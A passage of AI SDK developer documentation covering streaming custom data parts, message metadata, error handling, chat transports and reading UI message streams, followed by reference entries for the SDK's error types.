          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </div>
  );
}

Configure Request Options

You can configure the API endpoint, optional headers and credentials using the api, headers and credentials settings.

const { submit, object } = useObject({
  api: '/api/use-object',
  headers: {
    'X-Custom-Header': 'CustomValue',
  },
  credentials: 'include',
  schema: yourSchema,
});

title: Streaming Custom Data description: Learn how to stream custom data from the server to the client.

Streaming Custom Data

The AI SDK provides several helpers that allows you to stream additional data to the client and attach it to the UIMessage parts array:

createUIMessageStream: creates a data stream
createUIMessageStreamResponse: creates a response object that streams data
pipeUIMessageStreamToResponse: pipes a data stream to a server response object

The data is streamed as part of the response stream using Server-Sent Events.

Setting Up Type-Safe Data Streaming

First, define your custom message type with data part schemas for type safety:

import { UIMessage } from 'ai';

// Define your custom message type with data part schemas
export type MyUIMessage = UIMessage<
  never, // metadata type
  {
    weather: {
      city: string;
      weather?: string;
      status: 'loading' | 'success';
    };
    notification: {
      message: string;
      level: 'info' | 'warning' | 'error';
    };
  } // data parts type
>;

Streaming Data from the Server

In your server-side route handler, you can create a UIMessageStream and then pass it to createUIMessageStreamResponse:

import { openai } from '@ai-sdk/openai';
import {
  createUIMessageStream,
  createUIMessageStreamResponse,
  streamText,
  convertToModelMessages,
} from 'ai';
__PROVIDER_IMPORT__;
import type { MyUIMessage } from '@/ai/types';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const stream = createUIMessageStream<MyUIMessage>({
    execute: ({ writer }) => {
      // 1. Send initial status (transient - won't be added to message history)
      writer.write({
        type: 'data-notification',
        data: { message: 'Processing your request...', level: 'info' },
        transient: true, // This part won't be added to message history
      });

      // 2. Send sources (useful for RAG use cases)
      writer.write({
        type: 'source',
        value: {
          type: 'source',
          sourceType: 'url',
          id: 'source-1',
          url: 'https://weather.com',
          title: 'Weather Data Source',
        },
      });

      // 3. Send data parts with loading state
      writer.write({
        type: 'data-weather',
        id: 'weather-1',
        data: { city: 'San Francisco', status: 'loading' },
      });

      const result = streamText({
        model: __MODEL__,
        messages: await convertToModelMessages(messages),
        onFinish() {
          // 4. Update the same data part (reconciliation)
          writer.write({
            type: 'data-weather',
            id: 'weather-1', // Same ID = update existing part
            data: {
              city: 'San Francisco',
              weather: 'sunny',
              status: 'success',
            },
          });

          // 5. Send completion notification (transient)
          writer.write({
            type: 'data-notification',
            data: { message: 'Request completed', level: 'info' },
            transient: true, // Won't be added to message history
          });
        },
      });

      writer.merge(result.toUIMessageStream());
    },
  });

  return createUIMessageStreamResponse({ stream });
}

Types of Streamable Data

Data Parts (Persistent)

Regular data parts are added to the message history and appear in message.parts:

writer.write({
  type: 'data-weather',
  id: 'weather-1', // Optional: enables reconciliation
  data: { city: 'San Francisco', status: 'loading' },
});

Sources

Sources are useful for RAG implementations where you want to show which documents or URLs were referenced:

writer.write({
  type: 'source',
  value: {
    type: 'source',
    sourceType: 'url',
    id: 'source-1',
    url: 'https://example.com',
    title: 'Example Source',
  },
});

Transient Data Parts (Ephemeral)

Transient parts are sent to the client but not added to the message history. They are only accessible via the onData useChat handler:

// server
writer.write({
  type: 'data-notification',
  data: { message: 'Processing...', level: 'info' },
  transient: true, // Won't be added to message history
});

// client
const [notification, setNotification] = useState();

const { messages } = useChat({
  onData: ({ data, type }) => {
    if (type === 'data-notification') {
      setNotification({ message: data.message, level: data.level });
    }
  },
});

Data Part Reconciliation

When you write to a data part with the same ID, the client automatically reconciles and updates that part. This enables powerful dynamic experiences like:

Collaborative artifacts - Update code, documents, or designs in real-time
Progressive data loading - Show loading states that transform into final results
Live status updates - Update progress bars, counters, or status indicators
Interactive components - Build UI elements that evolve based on user interaction

The reconciliation happens automatically - simply use the same id when writing to the stream.

Processing Data on the Client

Using the onData Callback

The onData callback is essential for handling streaming data, especially transient parts:

import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from '@/ai/types';

const { messages } = useChat<MyUIMessage>({
  api: '/api/chat',
  onData: dataPart => {
    // Handle all data parts as they arrive (including transient parts)
    console.log('Received data part:', dataPart);

    // Handle different data part types
    if (dataPart.type === 'data-weather') {
      console.log('Weather update:', dataPart.data);
    }

    // Handle transient notifications (ONLY available here, not in message.parts)
    if (dataPart.type === 'data-notification') {
      showToast(dataPart.data.message, dataPart.data.level);
    }
  },
});

Important: Transient data parts are only available through the onData callback. They will not appear in the message.parts array since they're not added to message history.

Rendering Persistent Data Parts

You can filter and render data parts from the message parts array:

const result = (
  <>
    {messages?.map(message => (
      <div key={message.id}>
        {/* Render weather data parts */}
        {message.parts
          .filter(part => part.type === 'data-weather')
          .map((part, index) => (
            <div key={index} className="weather-widget">
              {part.data.status === 'loading' ? (
                <>Getting weather for {part.data.city}...</>
              ) : (
                <>
                  Weather in {part.data.city}: {part.data.weather}
                </>
              )}
            </div>
          ))}

        {/* Render text content */}
        {message.parts
          .filter(part => part.type === 'text')
          .map((part, index) => (
            <div key={index}>{part.text}</div>
          ))}

        {/* Render sources */}
        {message.parts
          .filter(part => part.type === 'source')
          .map((part, index) => (
            <div key={index} className="source">
              Source: <a href={part.url}>{part.title}</a>
            </div>
          ))}
      </div>
    ))}
  </>
);

Complete Example

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import type { MyUIMessage } from '@/ai/types';

export default function Chat() {
  const [input, setInput] = useState('');

  const { messages, sendMessage } = useChat<MyUIMessage>({
    api: '/api/chat',
    onData: dataPart => {
      // Handle transient notifications
      if (dataPart.type === 'data-notification') {
        console.log('Notification:', dataPart.data.message);
      }
    },
  });

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <>
      {messages?.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}

          {/* Render weather data */}
          {message.parts
            .filter(part => part.type === 'data-weather')
            .map((part, index) => (
              <span key={index} className="weather-update">
                {part.data.status === 'loading' ? (
                  <>Getting weather for {part.data.city}...</>
                ) : (
                  <>
                    Weather in {part.data.city}: {part.data.weather}
                  </>
                )}
              </span>
            ))}

          {/* Render text content */}
          {message.parts
            .filter(part => part.type === 'text')
            .map((part, index) => (
              <div key={index}>{part.text}</div>
            ))}
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          placeholder="Ask about the weather..."
        />
        <button type="submit">Send</button>
      </form>
    </>
  );
}

Use Cases

RAG Applications - Stream sources and retrieved documents
Real-time Status - Show loading states and progress updates
Collaborative Tools - Stream live updates to shared artifacts
Analytics - Send usage data without cluttering message history
Notifications - Display temporary alerts and status messages

Message Metadata vs Data Parts

Both message metadata and data parts allow you to send additional information alongside messages, but they serve different purposes:

Message Metadata

Message metadata is best for message-level information that describes the message as a whole:

Attached at the message level via message.metadata
Sent using the messageMetadata callback in toUIMessageStreamResponse
Ideal for: timestamps, model info, token usage, user context
Type-safe with custom metadata types

// Server: Send metadata about the message
return result.toUIMessageStreamResponse({
  messageMetadata: ({ part }) => {
    if (part.type === 'finish') {
      return {
        model: part.response.modelId,
        totalTokens: part.totalUsage.totalTokens,
        createdAt: Date.now(),
      };
    }
  },
});

Data Parts

Data parts are best for streaming dynamic arbitrary data:

Added to the message parts array via message.parts
Streamed using createUIMessageStream and writer.write()
Can be reconciled/updated using the same ID
Support transient parts that don't persist
Ideal for: dynamic content, loading states, interactive components

// Server: Stream data as part of message content
writer.write({
  type: 'data-weather',
  id: 'weather-1',
  data: { city: 'San Francisco', status: 'loading' },
});

For more details on message metadata, see the Message Metadata documentation.

title: Error Handling description: Learn how to handle errors in the AI SDK UI

Error Handling and warnings

Warnings

The AI SDK shows warnings when something might not work as expected. These warnings help you fix problems before they cause errors.

When Warnings Appear

Warnings are shown in the browser console when:

Unsupported features: You use a feature or setting that is not supported by the AI model (e.g., certain options or parameters).
Compatibility warnings: A feature is used in a compatibility mode, which might work differently or less optimally than intended.
Other warnings: The AI model reports another type of issue, such as general problems or advisory messages.

Warning Messages

All warnings start with "AI SDK Warning:" so you can easily find them. For example:

AI SDK Warning: The feature "temperature" is not supported by this model

Turning Off Warnings

By default, warnings are shown in the console. You can control this behavior:

Turn Off All Warnings

Set a global variable to turn off warnings completely:

globalThis.AI_SDK_LOG_WARNINGS = false;

Custom Warning Handler

You can also provide your own function to handle warnings. It receives provider id, model id, and a list of warnings.

globalThis.AI_SDK_LOG_WARNINGS = ({ warnings, provider, model }) => {
  // Handle warnings your own way
};

Error Handling

Error Helper Object

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { messages, sendMessage, error, regenerate } = useChat();

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}:{' '}
          {m.parts
            .filter(part => part.type === 'text')
            .map(part => part.text)
            .join('')}
        </div>
      ))}

      {error && (
        <>
          <div>An error occurred.</div>
          <button type="button" onClick={() => regenerate()}>
            Retry
          </button>
        </>
      )}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          disabled={error != null}
        />
      </form>
    </div>
  );
}

Alternative: replace last message

Alternatively you can write a custom submit handler that replaces the last message when an error is present.

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { sendMessage, error, messages, setMessages } = useChat();

  function customSubmit(event: React.FormEvent<HTMLFormElement>) {
    event.preventDefault();

    if (error != null) {
      setMessages(messages.slice(0, -1)); // remove last message
    }

    sendMessage({ text: input });
    setInput('');
  }

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}:{' '}
          {m.parts
            .filter(part => part.type === 'text')
            .map(part => part.text)
            .join('')}
        </div>
      ))}

      {error && <div>An error occurred.</div>}

      <form onSubmit={customSubmit}>
        <input value={input} onChange={e => setInput(e.target.value)} />
      </form>
    </div>
  );
}

Error Handling Callback

Errors can be processed by passing an onError callback function as an option to the useChat or useCompletion hooks. The callback function receives an error object as an argument.

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const {
    /* ... */
  } = useChat({
    // handle error:
    onError: error => {
      console.error(error);
    },
  });
}

Injecting Errors for Testing

You might want to create errors for testing. You can easily do so by throwing an error in your route handler:

export async function POST(req: Request) {
  throw new Error('This is a test error');
}

title: Transport description: Learn how to use custom transports with useChat.

Transport

Default Transport

By default, useChat uses HTTP POST requests to send messages to /api/chat:

import { useChat } from '@ai-sdk/react';

// Uses default HTTP transport
const { messages, sendMessage } = useChat();

This is equivalent to:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/chat',
  }),
});

Custom Transport Configuration

Configure the default transport with custom options:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/custom-chat',
    headers: {
      Authorization: 'Bearer your-token',
      'X-API-Version': '2024-01',
    },
    credentials: 'include',
  }),
});

Dynamic Configuration

You can also provide functions that return configuration values. This is useful for authentication tokens that need to be refreshed, or for configuration that depends on runtime conditions:

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/chat',
    headers: () => ({
      Authorization: `Bearer ${getAuthToken()}`,
      'X-User-ID': getCurrentUserId(),
    }),
    body: () => ({
      sessionId: getCurrentSessionId(),
      preferences: getUserPreferences(),
    }),
    credentials: () => 'include',
  }),
});

Request Transformation

Transform requests before sending to your API:

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/chat',
    prepareSendMessagesRequest: ({ id, messages, trigger, messageId }) => {
      return {
        headers: {
          'X-Session-ID': id,
        },
        body: {
          messages: messages.slice(-10), // Only send last 10 messages
          trigger,
          messageId,
        },
      };
    },
  }),
});

Direct Agent Transport

For scenarios where you want to communicate directly with an Agent without going through HTTP, you can use DirectChatTransport. This transport invokes the agent's stream() method directly in-process.

This is useful for:

Server-side rendering: Run the agent on the server without an API endpoint
Testing: Test chat functionality without network requests
Single-process applications: Desktop or CLI apps where client and agent run together

import { useChat } from '@ai-sdk/react';
import { DirectChatTransport, ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: 'You are a helpful assistant.',
  tools: {
    weather: weatherTool,
  },
});

const { messages, sendMessage } = useChat({
  transport: new DirectChatTransport({ agent }),
});

How It Works

Unlike DefaultChatTransport which sends HTTP requests:

DirectChatTransport validates incoming UI messages
Converts them to model messages using convertToModelMessages
Calls the agent's stream() method directly
Returns the result as a UI message stream via toUIMessageStream()

Configuration Options

You can pass additional options to customize the stream output:

const transport = new DirectChatTransport({
  agent,
  // Pass options to the agent
  options: { customOption: 'value' },
  // Configure what's sent to the client
  sendReasoning: true,
  sendSources: true,
});

For complete API details, see the DirectChatTransport reference.

Building Custom Transports

To understand how to build your own transport, refer to the source code of the default implementation:

DefaultChatTransport - The complete default HTTP transport implementation
HttpChatTransport - Base HTTP transport with request handling
ChatTransport Interface - The transport interface you need to implement

These implementations show you exactly how to:

Handle the sendMessages method
Process UI message streams
Transform requests and responses
Handle errors and connection management

The transport system gives you complete control over how your chat application communicates, enabling integration with any backend protocol or service.

title: Reading UIMessage Streams description: Learn how to read UIMessage streams.

Reading UI Message Streams

UIMessage streams are useful outside of traditional chat use cases. You can consume them for terminal UIs, custom stream processing on the client, or React Server Components (RSC).

The readUIMessageStream helper transforms a stream of UIMessageChunk objects into an AsyncIterableStream of UIMessage objects, allowing you to process messages as they're being constructed.

Basic Usage

import { readUIMessageStream, streamText } from 'ai';
__PROVIDER_IMPORT__;

async function main() {
  const result = streamText({
    model: __MODEL__,
    prompt: 'Write a short story about a robot.',
  });

  for await (const uiMessage of readUIMessageStream({
    stream: result.toUIMessageStream(),
  })) {
    console.log('Current message state:', uiMessage);
  }
}

Tool Calls Integration

Handle streaming responses that include tool calls:

import { readUIMessageStream, streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function handleToolCalls() {
  const result = streamText({
    model: __MODEL__,
    tools: {
      weather: tool({
        description: 'Get the weather in a location',
        inputSchema: z.object({
          location: z.string().describe('The location to get the weather for'),
        }),
        execute: ({ location }) => ({
          location,
          temperature: 72 + Math.floor(Math.random() * 21) - 10,
        }),
      }),
    },
    prompt: 'What is the weather in Tokyo?',
  });

  for await (const uiMessage of readUIMessageStream({
    stream: result.toUIMessageStream(),
  })) {
    // Handle different part types
    uiMessage.parts.forEach(part => {
      switch (part.type) {
        case 'text':
          console.log('Text:', part.text);
          break;
        case 'tool-call':
          console.log('Tool called:', part.toolName, 'with args:', part.args);
          break;
        case 'tool-result':
          console.log('Tool result:', part.result);
          break;
      }
    });
  }
}

Resuming Conversations

Resume streaming from a previous message state:

import { readUIMessageStream, streamText } from 'ai';
__PROVIDER_IMPORT__;

async function resumeConversation(lastMessage: UIMessage) {
  const result = streamText({
    model: __MODEL__,
    messages: [
      { role: 'user', content: 'Continue our previous conversation.' },
    ],
  });

  // Resume from the last message
  for await (const uiMessage of readUIMessageStream({
    stream: result.toUIMessageStream(),
    message: lastMessage, // Resume from this message
  })) {
    console.log('Resumed message:', uiMessage);
  }
}

title: Message Metadata description: Learn how to attach and use metadata with messages in AI SDK UI

Message Metadata

Overview

Getting Started

Here's a simple example of using message metadata to track timestamps and model information:

Defining Metadata Types

First, define your metadata type for type safety:

import { UIMessage } from 'ai';
import { z } from 'zod';

// Define your metadata schema
export const messageMetadataSchema = z.object({
  createdAt: z.number().optional(),
  model: z.string().optional(),
  totalTokens: z.number().optional(),
});

export type MessageMetadata = z.infer<typeof messageMetadataSchema>;

// Create a typed UIMessage
export type MyUIMessage = UIMessage<MessageMetadata>;

Sending Metadata from the Server

Use the messageMetadata callback in toUIMessageStreamResponse to send metadata at different streaming stages:

import { convertToModelMessages, streamText } from 'ai';
__PROVIDER_IMPORT__;
import type { MyUIMessage } from '@/types';

export async function POST(req: Request) {
  const { messages }: { messages: MyUIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages, // pass this in for type-safe return objects
    messageMetadata: ({ part }) => {
      // Send metadata when streaming starts
      if (part.type === 'start') {
        return {
          createdAt: Date.now(),
          model: 'your-model-id',
        };
      }

      // Send additional metadata when streaming completes
      if (part.type === 'finish') {
        return {
          totalTokens: part.totalUsage.totalTokens,
        };
      }
    },
  });
}

Accessing Metadata on the Client

Access metadata through the message.metadata property:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import type { MyUIMessage } from '@/types';

export default function Chat() {
  const { messages } = useChat<MyUIMessage>({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>
            {message.role === 'user' ? 'User: ' : 'AI: '}
            {message.metadata?.createdAt && (
              <span className="text-sm text-gray-500">
                {new Date(message.metadata.createdAt).toLocaleTimeString()}
              </span>
            )}
          </div>

          {/* Render message content */}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <div key={index}>{part.text}</div> : null,
          )}

          {/* Display additional metadata */}
          {message.metadata?.totalTokens && (
            <div className="text-xs text-gray-400">
              {message.metadata.totalTokens} tokens
            </div>
          )}
        </div>
      ))}
    </div>
  );
}

Common Use Cases

Message metadata is ideal for:

Timestamps: When messages were created or completed
Model Information: Which AI model was used
Token Usage: Track costs and usage limits
User Context: User IDs, session information
Performance Metrics: Generation time, time to first token
Quality Indicators: Finish reason, confidence scores

title: AI_APICallError description: Learn how to fix AI_APICallError

AI_APICallError

This error occurs when an API call fails.

Properties

url: The URL of the API request that failed
requestBodyValues: The request body values sent to the API
statusCode: The HTTP status code returned by the API (optional)
responseHeaders: The response headers returned by the API (optional)
responseBody: The response body returned by the API (optional)
isRetryable: Whether the request can be retried based on the status code
data: Any additional data associated with the error (optional)
cause: The underlying error that caused the API call to fail (optional)

Checking for this Error

You can check if an error is an instance of AI_APICallError using:

import { APICallError } from 'ai';

if (APICallError.isInstance(error)) {
  // Handle the error
}

title: AI_DownloadError description: Learn how to fix AI_DownloadError

AI_DownloadError

This error occurs when a download fails.

Properties

url: The URL that failed to download
statusCode: The HTTP status code returned by the server (optional)
statusText: The HTTP status text returned by the server (optional)
cause: The underlying error that caused the download to fail (optional)
message: The error message containing details about the download failure (optional, auto-generated)

Checking for this Error

You can check if an error is an instance of AI_DownloadError using:

import { DownloadError } from 'ai';

if (DownloadError.isInstance(error)) {
  // Handle the error
}

title: AI_EmptyResponseBodyError description: Learn how to fix AI_EmptyResponseBodyError

AI_EmptyResponseBodyError

This error occurs when the server returns an empty response body.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_EmptyResponseBodyError using:

import { EmptyResponseBodyError } from 'ai';

if (EmptyResponseBodyError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidArgumentError description: Learn how to fix AI_InvalidArgumentError

AI_InvalidArgumentError

This error occurs when an invalid argument was provided.

Properties

parameter: The name of the parameter that is invalid
value: The invalid value
message: The error message

Checking for this Error

You can check if an error is an instance of AI_InvalidArgumentError using:

import { InvalidArgumentError } from 'ai';

if (InvalidArgumentError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidDataContentError description: How to fix AI_InvalidDataContentError

AI_InvalidDataContentError

This error occurs when the data content provided in a multi-modal message part is invalid. Check out the prompt examples for multi-modal messages .

Properties

content: The invalid content value
cause: The underlying error that caused this error (optional)
message: The error message describing the expected and received content types (optional, auto-generated)

Checking for this Error

You can check if an error is an instance of AI_InvalidDataContentError using:

import { InvalidDataContentError } from 'ai';

if (InvalidDataContentError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidMessageRoleError description: Learn how to fix AI_InvalidMessageRoleError

AI_InvalidMessageRoleError

This error occurs when an invalid message role is provided.

Properties

role: The invalid role value
message: The error message (optional, auto-generated from role)

Checking for this Error

You can check if an error is an instance of AI_InvalidMessageRoleError using:

import { InvalidMessageRoleError } from 'ai';

if (InvalidMessageRoleError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidPromptError description: Learn how to fix AI_InvalidPromptError

AI_InvalidPromptError

This error occurs when the prompt provided is invalid.

Potential Causes

UI Messages

You are passing a UIMessage[] as messages into e.g. streamText.

You need to first convert them to a ModelMessage[] using convertToModelMessages().

import { type UIMessage, generateText, convertToModelMessages } from 'ai';

const messages: UIMessage[] = [
  /* ... */
];

const result = await generateText({
  // ...
  messages: await convertToModelMessages(messages),
});

Properties

prompt: The invalid prompt value
message: The error message (required in constructor)
cause: The cause of the error (optional)

Checking for this Error

You can check if an error is an instance of AI_InvalidPromptError using:

import { InvalidPromptError } from 'ai';

if (InvalidPromptError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidResponseDataError description: Learn how to fix AI_InvalidResponseDataError

AI_InvalidResponseDataError

This error occurs when the server returns a response with invalid data content.

Properties

data: The invalid response data value
message: The error message

Checking for this Error

You can check if an error is an instance of AI_InvalidResponseDataError using:

import { InvalidResponseDataError } from 'ai';

if (InvalidResponseDataError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidToolApprovalError description: Learn how to fix AI_InvalidToolApprovalError

AI_InvalidToolApprovalError

This error occurs when a tool approval response references an unknown approvalId. No matching tool-approval-request was found in the message history.

Properties

approvalId: The approval ID that was not found

Checking for this Error

You can check if an error is an instance of AI_InvalidToolApprovalError using:

import { InvalidToolApprovalError } from 'ai';

if (InvalidToolApprovalError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidToolInputError description: Learn how to fix AI_InvalidToolInputError

AI_InvalidToolInputError

This error occurs when invalid tool input was provided.

Properties

toolName: The name of the tool with invalid inputs
toolInput: The invalid tool inputs
message: The error message
cause: The cause of the error

Checking for this Error

You can check if an error is an instance of AI_InvalidToolInputError using:

import { InvalidToolInputError } from 'ai';

if (InvalidToolInputError.isInstance(error)) {
  // Handle the error
}

title: AI_JSONParseError description: Learn how to fix AI_JSONParseError

AI_JSONParseError

This error occurs when JSON fails to parse.

Properties

text: The text value that could not be parsed
cause: The underlying parsing error (required in constructor)

Checking for this Error

You can check if an error is an instance of AI_JSONParseError using:

import { JSONParseError } from 'ai';

if (JSONParseError.isInstance(error)) {
  // Handle the error
}

title: AI_LoadAPIKeyError description: Learn how to fix AI_LoadAPIKeyError

AI_LoadAPIKeyError

This error occurs when API key is not loaded successfully.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_LoadAPIKeyError using:

import { LoadAPIKeyError } from 'ai';

if (LoadAPIKeyError.isInstance(error)) {
  // Handle the error
}

title: AI_LoadSettingError description: Learn how to fix AI_LoadSettingError

AI_LoadSettingError

This error occurs when a setting is not loaded successfully.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_LoadSettingError using:

import { LoadSettingError } from 'ai';

if (LoadSettingError.isInstance(error)) {
  // Handle the error
}

title: AI_MessageConversionError description: Learn how to fix AI_MessageConversionError

AI_MessageConversionError

This error occurs when message conversion fails.

Properties

originalMessage: The original message that failed conversion
message: The error message

Checking for this Error

You can check if an error is an instance of AI_MessageConversionError using:

import { MessageConversionError } from 'ai';

if (MessageConversionError.isInstance(error)) {
  // Handle the error
}

title: AI_NoContentGeneratedError description: Learn how to fix AI_NoContentGeneratedError

AI_NoContentGeneratedError

This error occurs when the AI provider fails to generate content.

Properties

message: The error message (optional, defaults to 'No content generated.')

Checking for this Error

You can check if an error is an instance of AI_NoContentGeneratedError using:

import { NoContentGeneratedError } from 'ai';

if (NoContentGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoImageGeneratedError description: Learn how to fix AI_NoImageGeneratedError

AI_NoImageGeneratedError

This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:

The model failed to generate a response.
The model generated an invalid response.

Properties

message: The error message (optional, defaults to 'No image generated.').
responses: Metadata about the image model responses, including timestamp, model, and headers (optional).
cause: The cause of the error. You can use this for more detailed error handling (optional).

Checking for this Error

You can check if an error is an instance of AI_NoImageGeneratedError using:

import { generateImage, NoImageGeneratedError } from 'ai';

try {
  await generateImage({ model, prompt });
} catch (error) {
  if (NoImageGeneratedError.isInstance(error)) {
    console.log('NoImageGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

title: AI_NoObjectGeneratedError description: Learn how to fix AI_NoObjectGeneratedError

AI_NoObjectGeneratedError

This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:

The model failed to generate a response.
The model generated a response that could not be parsed.
The model generated a response that could not be validated against the schema.

Properties

message: The error message (optional, defaults to 'No object generated.').
text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode (optional).
response: Metadata about the language model response, including response id, timestamp, and model (required in constructor).
usage: Request token usage (required in constructor).
finishReason: Request finish reason. For example 'length' if model generated maximum number of tokens, this could result in a JSON parsing error (required in constructor).
cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling (optional).

Checking for this Error

You can check if an error is an instance of AI_NoObjectGeneratedError using:

import { generateText, NoObjectGeneratedError, Output } from 'ai';

try {
  await generateText({ model, output: Output.object({ schema }), prompt });
} catch (error) {
  if (NoObjectGeneratedError.isInstance(error)) {
    console.log('NoObjectGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Text:', error.text);
    console.log('Response:', error.response);
    console.log('Usage:', error.usage);
    console.log('Finish Reason:', error.finishReason);
  }
}

title: AI_NoOutputGeneratedError description: Learn how to fix AI_NoOutputGeneratedError

AI_NoOutputGeneratedError

This error is thrown when no LLM output was generated, e.g. because of errors.

Properties

message: The error message (optional, defaults to 'No output generated.')
cause: The underlying error that caused no output to be generated (optional)

Checking for this Error

You can check if an error is an instance of AI_NoOutputGeneratedError using:

import { NoOutputGeneratedError } from 'ai';

if (NoOutputGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSpeechGeneratedError description: Learn how to fix AI_NoSpeechGeneratedError

AI_NoSpeechGeneratedError

This error occurs when no audio could be generated from the input.

Properties

responses: Array of speech model response metadata (required in constructor)

Checking for this Error

You can check if an error is an instance of AI_NoSpeechGeneratedError using:

import { NoSpeechGeneratedError } from 'ai';

if (NoSpeechGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchModelError description: Learn how to fix AI_NoSuchModelError

AI_NoSuchModelError

This error occurs when a model ID is not found.

Properties

modelId: The ID of the model that was not found
modelType: The type of model ('languageModel', 'embeddingModel', 'imageModel', 'transcriptionModel', 'speechModel', or 'rerankingModel')
message: The error message (optional, auto-generated from modelId and modelType)

Checking for this Error

You can check if an error is an instance of AI_NoSuchModelError using:

import { NoSuchModelError } from 'ai';

if (NoSuchModelError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchProviderError description: Learn how to fix AI_NoSuchProviderError

AI_NoSuchProviderError

This error occurs when a provider ID is not found.

Properties

providerId: The ID of the provider that was not found
availableProviders: Array of available provider IDs
modelId: The ID of the model
modelType: The type of model
message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoSuchProviderError using:

import { NoSuchProviderError } from 'ai';

if (NoSuchProviderError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchToolError description: Learn how to fix AI_NoSuchToolError

AI_NoSuchToolError

This error occurs when a model tries to call an unavailable tool.

Properties

toolName: The name of the tool that was not found
availableTools: Array of available tool names (optional)
message: The error message (optional, auto-generated from toolName and availableTools)

Checking for this Error

You can check if an error is an instance of AI_NoSuchToolError using:

import { NoSuchToolError } from 'ai';

if (NoSuchToolError.isInstance(error)) {
  // Handle the error
}

title: AI_NoTranscriptGeneratedError description: Learn how to fix AI_NoTranscriptGeneratedError

AI_NoTranscriptGeneratedError

This error occurs when no transcript could be generated from the input.

Properties

responses: Array of transcription model response metadata (required in constructor)

Checking for this Error

You can check if an error is an instance of AI_NoTranscriptGeneratedError using:

import { NoTranscriptGeneratedError } from 'ai';

if (NoTranscriptGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoVideoGeneratedError description: Learn how to fix AI_NoVideoGeneratedError

AI_NoVideoGeneratedError

This error occurs when the AI provider fails to generate a video. It can arise due to the following reasons:

The model failed to generate a response.
The model generated an invalid response.

Properties

message: The error message (optional, defaults to 'No video generated.').
responses: Metadata about the video model responses, including timestamp, model, and headers (optional).
cause: The cause of the error. You can use this for more detailed error handling (optional).

Checking for this Error

You can check if an error is an instance of AI_NoVideoGeneratedError using:

import {
  experimental_generateVideo as generateVideo,
  NoVideoGeneratedError,
} from 'ai';

try {
  await generateVideo({ model, prompt });
} catch (error) {
  if (NoVideoGeneratedError.isInstance(error)) {
    console.log('NoVideoGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

title: AI_RetryError description: Learn how to fix AI_RetryError

AI_RetryError

This error occurs when a retry operation fails.

Properties

reason: The reason for the retry failure
lastError: The most recent error that occurred during retries
errors: Array of all errors that occurred during retry attempts
message: The error message

Checking for this Error

You can check if an error is an instance of AI_RetryError using:

import { RetryError } from 'ai';

if (RetryError.isInstance(error)) {
  // Handle the error
}

title: AI_TooManyEmbeddingValuesForCallError description: Learn how to fix AI_TooManyEmbeddingValuesForCallError

AI_TooManyEmbeddingValuesForCallError

This error occurs when too many values are provided in a single embedding call.

Properties

provider: The AI provider name
modelId: The ID of the embedding model
maxEmbeddingsPerCall: The maximum number of embeddings allowed per call
values: The array of values that was provided

Checking for this Error

You can check if an error is an instance of AI_TooManyEmbeddingValuesForCallError using:

